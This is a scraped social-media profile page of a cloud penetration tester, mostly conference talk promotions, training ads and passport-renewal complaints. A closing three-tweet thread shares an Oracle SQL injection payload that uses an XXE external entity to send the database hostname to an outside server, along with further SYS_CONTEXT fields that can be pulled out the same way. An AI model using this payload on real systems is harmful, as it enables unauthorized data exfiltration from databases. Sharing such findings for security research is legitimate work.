Raunak Parmar
@trouble1_raunak
Followers
2K
Following
759
Media
206
Statuses
1K
Senior Cloud Security Engineer @WKL_cyber | OSWE | Presenter at @BlackHatEvents @defcon @nullcon | Author of Vajra | ex DJ & Music Producer
India
Joined March 2016
White Knight Labs’ own @trouble1_raunak took the stage today at MCTTP in Munich, Germany, presenting: “From HTML Injection to Full AWS Account Takeover: Discovering Critical Risks in PDF Generation Features.” Thank you, Raunak, sharing your knowledge
0
2
11
Nice to meet the Indian hacker group at @MCTTP_Con including @trouble1_raunak. Going to miss his talk as we both are speaking at the same time ☹️
1
2
8
AzDevRecon – Turning Tokens into DevOps Portal One token = full Azure DevOps access. Repos, pipelines, creds. Blog: https://t.co/WG8jWl3YyZ 🎓 Learn to defend it: ASCPC at DEFCON, Aug 11–12 → https://t.co/wEGEFEuUiw
1
3
5
🛠️ Excited to feature @trouble1_raunak at Cloud Village @DEFCON 33! He’ll demo: “AzDevRecon – Azure DevOps Enumeration Tool” 🔍🚧 📍 Room 311, LVCC 🗓️ Aug 8 | 🕧 12:30–1:00 PM PT 🔗 https://t.co/GegDx80ygv
#CloudVillage #ToolDemo #AzureDevOps #HackerSummerCamp #DEFCON33
0
4
12
Hackers target your CI/CD. Learn to fight back. @trouble1_raunak live at @defcon, Aug 11–12. $200 off: https://t.co/BCZOB27ZH9 Code: DCTLV25-WKL Cert + lifetime access included. https://t.co/JxFCsNWdgE
0
2
2
What an amazing stage setup, it was really a great experience delivering a talk at @_leHACK_ , Paris
0
0
2
@narendramodi @narendramodi_in @MEAIndia @CPVIndia @passportsevamea @PMOIndia @HMOIndia @rpomumbai @MumbaiPolice @ndtvindia @timesofindia I am extremely disappointed and frustrated with the Passport renewal process. It has been 3 months since I submitted my passport for renewal.
5
35
32
Why do police officer always ask for bribe (corruption) for the passport? @rpomumbai @MumbaiPolice
The Indian passport renewal process is an absolute nightmare! Been struggling for 2.5 months. The RPO sent my form with the old address again!🤦♂️ Why apply for a normal passport when the process is this broken? @MEAIndia @CPVIndia @passportsevamea @PMOIndia @HMOIndia @rpomumbai
0
0
0
The Indian passport renewal process is an absolute nightmare! Been struggling for 2.5 months. The RPO sent my form with the old address again!🤦♂️ Why apply for a normal passport when the process is this broken? @MEAIndia @CPVIndia @passportsevamea @PMOIndia @HMOIndia @rpomumbai
2
3
1
I have started working on Beginner AWS Pentesting while learning to build before breaking it @trouble1_raunak thanks for motivation https://t.co/0MXYP7uiQd
youtube.com
0
2
6
Wanna learn and become pro in Azure Pentest? Check out Our on-demand Azure Training with 48 hrs of Exam which puts you in lots of challenges and allows you to open the door of Azure pentest.
🚨 Exciting News! Our Offensive Azure Operations and Tactics Certification (OAOTC) is now available with On-Demand Training! 💥 Plus, take on our rigorous 48-hour exam to prove your Azure skills! 🚀 https://t.co/YgAhNQhXUi
#OAOTC #Azure
@trouble1_raunak @WKL_cyber
0
1
2
Welcome to MCTTP 2024 Vlog! Join me as I embark on an unforgettable journey through Germany, starting with the @MCTTP_Con conference and then exploring the stunning cities of Munich, Julich, and Monschau #MCTTP2024 #cloudsecurity #azure #TravelVlog
https://t.co/nRXmf4jJD4
0
0
1
Real-World Azure Hack at #MCTTP2024! Our talk, "Hacker's Story from Reader to Global Admin," dives into how we escalated from a low-privilege Reader to Global Admin. Join us for exclusive insights and techniques used to exploit Azure. #AzureSecurity #CloudPentesting
0
3
17
[3/3] Similarly more data can also be extracted by using additional parameters: SYS_CONTEXT('USERENV', 'USER') SYS_CONTEXT('USERENV', 'INSTANCE_NAME') List of some more parameters: - SESSION_USER - OS_USER - HOST - IP_ADDRESS - SID - SESSIONID - LANGUAGE - TERMINAL
0
1
6
[2/3] a' || (SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM " https://t.co/JfrbSaj4jS' || SYS_CONTEXT('USERENV', 'HOST') || '">%xxe;]>'), '/l') FROM dual) || ' #sqlinjection #pentesting #hacking #websec #bugbounty #manual
3
1
15
[1/3] Found a Crazy XXE/SQL injection while hunting a random web application. 💉XXE Injection via Out-Of-Band-SQL Injection in Oracle Based Database 😈 Below 💊 payload allowed me to get the Hostname by using 𝗦𝗬𝗦_𝗖𝗢𝗡𝗧𝗘𝗫𝗧 which is a in-built function in Oracle SQL.
5
28
223